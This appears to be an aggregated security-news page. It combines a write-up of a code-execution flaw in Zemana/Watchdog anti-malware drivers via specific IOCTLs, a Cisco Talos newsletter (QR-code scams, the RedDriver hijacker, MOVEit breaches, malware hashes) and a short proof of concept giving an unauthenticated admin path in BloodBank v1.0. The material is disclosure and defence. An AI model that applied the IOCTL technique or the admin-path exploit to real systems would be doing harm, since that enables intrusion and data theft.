IOCTL 0x80002044 calls the function at the offset 0xBF60 (.text section) and allows to fill the stub in .hook section by an arbitrary user controlled code. IOCTL 0x80002014 (read via SCSI) or IOCTL 0x80002018 (write via SCSI) transfers a control to this filled stub.

**Affected products**

At least Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28. These products have the same vulnerable driver but signed with different certificates.

Zemana AntiLogger v2.74.2.664 has the same vulnerability. Vulnerable drivers: zamguard64.sys, zam64.sys.

**Affected operating systems**

64-bit versions of Windows: from Windows 7 to Windows 11

**Mitigation**

Uninstall Zemana or Watchdog Antimalware products. Add driver signatures to blacklist.

CVE-2022-42045: GitHub - ReCryptLLC/CVE-2022-42045

QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video.

Thursday, July 13, 2023 14:07

Welcome to this week’s edition of the Threat Source newsletter.

Although we can probably largely consider the COVID-19 pandemic “over,” many relics from the peak of lockdown and concerns over the virus are still around in mid-2023. It’s still impossible to get a doctor’s appointment quickly, but many restaurants have embraced al fresco dining and QR codes are back.

At one point I had totally written off QR codes as of 2010-ish, but now they’re all over restaurant menus, cash registers, tip jars and advertising. This started during the pandemic as a touch-free way of interacting with consumers and seems to be sticking around even though the days of indoor seating capacities are over.

QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video. But recently I discovered several “novel” ways in which bad guys are trying to capitalize on society’s newfound trust in QR codes.

Two months ago, Bleeping Computer reported on fake parking tickets floating around major U.S. and U.K. cities that had phony QR codes on them designed to trick users into “paying” a parking ticket they didn’t owe. That same week, there were also reports of phony Microsoft Word documents being sent via email to targets that contained QR codes claiming to be from the Chinese Ministry of Finance, thus bypassing traditional email security that usually scan things like links and the body copy in an email itself.

The local CBS station in Tampa Bay, Florida also came across a fake Amazon advertisement in March that claimed to enlist people who received a postcard to test out new products. When opened, the site on the other end of the QR code asked for the target’s personal and contact information.

I figured we’d be past the days of attackers just slapping QR codes onto random things, but I also thought we were done with QR codes altogether three years ago. So this serves as a PSA to not just scan any QR code you see in the wild “just because.”

Or, if you’re unsure about the origins of a QR code, iOS and Android phones will show a snippet of a URL that the QR code is sending the user before you click on it, so it’s important to double-check that the URL is where you intended on heading (ex., amazon.com). Either that or just ask for a paper menu at the restaurant.

**The one big thing**

Cisco Talos has identified multiple versions of an undocumented malicious driver named “RedDriver,” a driver-based browser hijacker that uses the Windows Filtering Platform (WFP) to intercept browser traffic. This threat appears to target native Chinese speakers, as it searches for Chinese language browsers to hijack. Additionally, the authors are likely Chinese speakers themselves. If installed, the malicious driver can hijack and spy on web traffic, potentially redirecting it to a source of the attacker’s choosing.

**Why do I care?**

This is a concrete example of a recent trend Talos has been following of threat actors taking advantage of a Windows policy loophole that allows the signing and loading of cross-signed kernel mode drivers with signature timestamp prior to July 29, 2015. We have observed over a dozen code-signing certificates with keys and passwords contained in a PFX file hosted on GitHub used in conjunction with these open-source tools. By forging signatures on kernel-mode drivers, attackers can bypass the certificate policies within Windows.

**So now what?**

Microsoft has blocked all certificates discussed in Talos' blogs posted this week and released an advisory on the matter as part of Patch Tuesday. Talos recommends blocking the certificates mentioned in this blog post, as malicious drivers are difficult to detect heuristically and are most effectively blocked based on file hashes or the certificates used to sign them. Comparing the signature timestamp to the compilation date of a driver can sometimes be an effective means of detecting instances of timestamp forging. Specifically, for RedDriver, there are a series of new Cisco Secure product protections in place to detect and block the malicious driver.

**Top security headlines of the week**

The **list of companies affected by the massive MOVEit mass hack continues to grow,** and now includes international hotel chain Radisson and GPS company TomTom. Clop, the ransomware group behind the attack against the MOVEit data transfer software that eventually led to data breaches at more than 100 organizations, added more companies to its leak site this week. Commercial banks Deutsche Bank and Commerzbank are also among the newest victims, with both companies reportedly having clients’ names and account numbers. The parent company of Radisson also confirmed that a “limited number of guest records” were accessed, though it did not provide an exact number. Clop originally used a zero-day vulnerability that’s since been patched to access MOVEit software instances and then steal certain information from users. One threat analyst at New Zealand anti-virus maker Emsisoft estimated that there are now more than 270 businesses affected across the globe, including 17 million individuals. (Tech Crunch, Bloomberg)

With Meta’s new microblogging platform **Threads taking off, users and privacy advocates are criticizing its privacy and data collection policies.** Meta, which is the parent company behind Facebook and Instagram, launched Threads last week to much fanfare and gained millions of new users in the first few hours of the app’s existence. However, the app has yet to launch in the European Union because it violates several GDPR policies. Threads’ privacy policy states the app has access to GPS location, cameras, photos, IP information, the type of device being used and device signals including “Bluetooth signals, nearby Wi-Fi access points, beacons and cell towers.” In general, Meta seems to collect more personal information on Threads users compared to other platforms, though not necessarily more than Facebook and Instagram, Meta’s other major platforms. (The Guardian, CPO Magazine)

Despite major efforts from international governments and the private sector to combat ransomware, **payments to threat actors are set to hit a new record in 2023.** A new report from blockchain company Chainanalysis reports that ransomware victims have paid adversaries $449.1 million in the first six months of this year, after that number didn’t even hit $500 million in 2022. If this pace continues, 2023 would be the second-most profitable year ever for ransomware groups behind 2021. Security researchers believe the dip in 2022 could be contributed to several factors, including Russia’s invasion of Ukraine disrupting some major APT groups and new decryption software from government agencies and private companies that can return victims’ files for free. Chainanalysis analysts state in the report that big-game hunting is largely contributing to this year’s revenue — in these cases, threat actors target major corporations that likely have the funds to pay large, requested ransom payments. (Wired, Bleeping Computer)

**Can’t get enough Talos?**

*   Cisco Talos Reports Microsoft Windows Policy Loophole Being Exploited by Threat Actor
*   Hackers target Chinese-speaking Microsoft users with ‘RedDriver’ browser hijacker
*   Gergana Karadzhova-Dangela wants to send the ladder back down to the next generation of incident responders
*   The growth of commercial spyware based intelligence providers without legal or ethical supervision
*   Microsoft discloses more than 130 vulnerabilities as part of July’s Patch Tuesday, four exploited in the wild

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** b4d8d7cbec7fe4c24dcb9b38f6036a58b765efda10c42fce7bbe2b2bf79cd53e  
**MD5:** c585f4faee96a0bec3b0f93f37239008  
**Typical Filename:** stream.txt  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Autoit::211461.in02

QR codes are relevant again for everyone from diners to threat actors

Uncovered issues fall into use-after-free, buffer-overflow, information leak and denial of service vulnerability classes. Some of these could be combined to achieve remote code execution or privilege escalation.

Uncovering weaknesses in Apple macOS and VMWare vCenter: 12 vulnerabilities in RPC implementation

BloodBank version 1.0 suffers from an insecure direct object reference vulnerability.

    ======================================================================================================================================| # Title     : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration unauthorized administrative access Vulnerability  || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267                     |  | # Dork      : n/a                                                                                                                  |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /admin/subscriber-csv.php[+]  http://127.0.0.1/demosly.om/xicia/cc/bloodbank/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows